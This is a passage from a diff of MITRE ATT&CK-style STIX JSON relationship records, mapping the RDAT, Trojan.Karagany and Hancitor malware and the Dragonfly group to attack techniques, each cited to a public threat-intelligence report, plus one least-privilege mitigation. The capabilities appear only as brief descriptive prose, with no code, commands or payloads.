"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "relationship_type": "mitigates", + "description": "Limit permissions to discover cloud accounts in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.", + "id": "relationship--e73bf2f8-b009-4555-8fda-3407fa87c812", + "type": "relationship", + "modified": "2020-08-13T16:53:55.563Z", + "created": "2020-08-11T13:13:12.311Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can take a screenshot on the infected system.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--49d50fde-cfbc-4007-befc-f4b22b9bc9f5", + "type": "relationship", + "modified": "2020-08-11T21:15:35.458Z", + "created": "2020-08-11T21:15:35.458Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--63b6fd1d-65a7-4c94-8045-16fd198802f1", + "type": "relationship", + "modified": "2020-08-11T21:15:35.488Z", + "created": "2020-08-11T21:15:35.488Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "id": "relationship--cfff835f-4c2b-4c90-b316-3807796269fc", + "type": "relationship", + "modified": "2020-08-11T21:46:03.607Z", + "created": "2020-08-11T21:15:35.490Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has used HTTP if DNS C2 communications were not functioning.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--d96db78c-e7b8-4877-8187-07c5e801cead", + "type": "relationship", + "modified": "2020-08-11T21:15:35.494Z", + "created": "2020-08-11T21:15:35.494Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can also embed data within a BMP image prior to exfiltration.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--15698fb0-12df-4135-8ecb-093e9fd268a2", + "type": "relationship", + "modified": "2020-08-11T21:51:34.095Z", + "created": "2020-08-11T21:15:35.497Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "id": "relationship--00f4c60b-36c4-4ec5-affd-38f89687d957", + "type": "relationship", + "modified": "2020-09-02T21:40:20.748Z", + "created": "2020-08-11T21:15:35.506Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can issue SOAP requests to delete already processed C2 emails. [RDAT](https://attack.mitre.org/software/S0495) can also delete itself from the infected system.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--b4445491-4549-4333-b6b8-034ab4932295", + "type": "relationship", + "modified": "2020-08-11T21:15:35.509Z", + "created": "2020-08-11T21:15:35.509Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has executed commands using cmd.exe /c.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--34810a1f-a9bd-4f1b-bbdc-4e8c4ec1ef21", + "type": "relationship", + "modified": "2020-08-11T21:15:35.493Z", + "created": "2020-08-11T21:15:35.493Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can process steganographic images attached to email messages to send and receive C2 commands. [RDAT](https://attack.mitre.org/software/S0495) can also embed additional messages within BMP images to communicate with the [RDAT](https://attack.mitre.org/software/S0495) operator.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--a760c63f-6459-430d-88ce-291513c47d11", + "type": "relationship", + "modified": "2020-08-19T17:34:47.589Z", + "created": "2020-08-11T21:15:35.555Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via base32-encoded subdomains.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--4de4cf78-542c-4f7a-a83b-f876a59e2553", + "type": "relationship", + "modified": "2020-09-02T21:40:20.835Z", + "created": "2020-08-11T21:15:35.557Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can download files via DNS.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--abca8fe1-0303-43a8-b469-a7921358a3f1", + "type": "relationship", + "modified": "2020-08-11T21:15:35.616Z", + "created": "2020-08-11T21:15:35.616Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has used DNS to communicate with the C2.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--3d70f1d9-366a-4510-91f6-fe15ca06d7a8", + "type": "relationship", + "modified": "2020-08-11T21:15:35.619Z", + "created": "2020-08-11T21:15:35.619Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "id": "relationship--dd4423f6-b526-4856-aa00-2c4aa36617da", + "type": "relationship", + "modified": "2020-08-11T21:15:35.628Z", + "created": "2020-08-11T21:15:35.628Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. [RDAT](https://attack.mitre.org/software/S0495) can also download data from the C2 which is split into 81,920-byte portions.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--a901b584-c676-4419-9357-943de685114e", + "type": "relationship", + "modified": "2020-08-19T18:03:03.776Z", + "created": "2020-08-11T21:15:35.623Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "external_references": [ + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) has used spearphising campaigns to gain access to victims.(Citation: Secureworks IRON LIBERTY July 2019)", + "relationship_type": "uses", + "id": "relationship--8e2fcd7a-ea71-439b-ad2a-7cdd51c7cb28", + "type": "relationship", + "modified": "2020-08-12T17:52:48.612Z", + "created": "2020-08-12T17:52:48.612Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "external_references": [ + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "(Citation: Secureworks IRON LIBERTY July 2019)", + "relationship_type": "uses", + "id": "relationship--e068332d-0b1c-4aba-a60f-37c640e20d10", + "type": "relationship", + "modified": "2020-08-12T17:52:48.619Z", + "created": "2020-08-12T17:52:48.619Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60", + "external_references": [ + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "(Citation: Secureworks IRON LIBERTY July 2019)", + "relationship_type": "uses", + "id": "relationship--dfd6892f-82a4-4db4-a132-3d6f221e55f4", + "type": "relationship", + "modified": "2020-08-12T17:52:48.627Z", + "created": "2020-08-12T17:52:48.627Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "external_references": [ + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) has placed trojanized installers on legitimate vendor app stores.(Citation: Secureworks IRON LIBERTY July 2019)", + "relationship_type": "uses", + "id": "relationship--9c3ada08-1908-4458-a454-d91fda25ad04", + "type": "relationship", + "modified": "2020-08-12T17:52:48.629Z", + "created": "2020-08-12T17:52:48.629Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "external_references": [ + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) has has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.(Citation: Secureworks IRON LIBERTY July 2019)", + "relationship_type": "uses", + "id": "relationship--5253d038-08a8-4d17-9549-bbcf67c37603", + "type": "relationship", + "modified": "2020-08-12T17:52:48.622Z", + "created": "2020-08-12T17:52:48.622Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture keystrokes on a compromised host.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--7808fe28-aa6f-4e81-9029-8b95bec15ad3", + "type": "relationship", + "modified": "2020-08-12T19:22:13.793Z", + "created": "2020-08-12T19:22:13.793Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can enumerate files and directories on a compromised host.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--7adebe2e-97f7-4a1a-8ac7-01b795dadc36", + "type": "relationship", + "modified": "2020-08-12T19:22:13.822Z", + "created": "2020-08-12T19:22:13.822Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "external_references": [ + { + "source_name": "Red Canary Verclsid.exe", + "url": "https://redcanary.com/blog/verclsid-exe-threat-detection/", + "description": "Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has used verclsid.exe to download and execute a malicious script.(Citation: Red Canary Verclsid.exe)", + "relationship_type": "uses", + "id": "relationship--331c41dc-7452-4328-a370-7556f659e8cb", + "type": "relationship", + "modified": "2020-08-12T19:34:09.254Z", + "created": "2020-08-12T19:32:56.400Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can base64 encode and AES-128-CBC encrypt data prior to transmission.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--2b00f3f4-ddde-4874-8315-5a5c5d671a33", + "type": "relationship", + "modified": "2020-08-13T14:05:44.328Z", + "created": "2020-08-13T14:05:44.328Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can secure C2 communications with SSL and TLS.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--96bf1608-d1fc-477f-be54-0dba2efd0038", + "type": "relationship", + "modified": "2020-08-13T14:05:44.400Z", + "created": "2020-08-13T14:05:44.400Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can communicate with C2 via HTTP POST requests.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--e93e4ac1-090d-4081-8cb5-9af71e807fd3", + "type": "relationship", + "modified": "2020-08-13T14:05:44.473Z", + "created": "2020-08-13T14:05:44.473Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) has used plugins with a self-delete capability.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--6645bf91-574b-46c3-b816-8ed45a465417", + "type": "relationship", + "modified": "2020-08-13T14:05:44.534Z", + "created": "2020-08-13T14:05:44.534Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can steal data and credentials from browsers.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--519b3d7a-2de3-470b-a1cd-f40d0c351ea3", + "type": "relationship", + "modified": "2020-08-13T14:05:44.782Z", + "created": "2020-08-13T14:05:44.782Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--9893220d-5db9-4978-a886-ff33cf417584", + "type": "relationship", + "modified": "2020-08-13T14:58:25.046Z", + "created": "2020-08-13T14:58:25.046Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can inject a suspended thread of its own process into a new process and initiate via the ResumeThread API.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--8e34d10d-0c24-41c6-8bde-727768256479", + "type": "relationship", + "modified": "2020-08-13T14:58:25.121Z", + "created": "2020-08-13T14:58:25.121Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "external_references": [ + { + "source_name": 